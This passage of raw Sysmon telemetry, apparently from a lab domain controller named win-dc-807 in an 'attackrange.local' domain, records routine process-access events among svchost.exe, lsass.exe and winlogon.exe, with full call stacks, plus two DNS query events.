System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:43.581{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:41.637{D28789B6-7C6F-5FA1-2A00-000000008801}2572win-dc-807.attackrange.local0fe80::823:2ec6:f5ff:fef1;2001:0:2851:782c:823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:41.597{D28789B6-7C64-5FA1-1500-000000008801}1336win-dc-8071460-C:\Windows\System32\svchost.exe 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.284{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-1000-000000008801}11441060C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-1000-000000008801}11441608C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-1000-000000008801}11441060C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-1000-000000008801}11441608C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:44.143{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 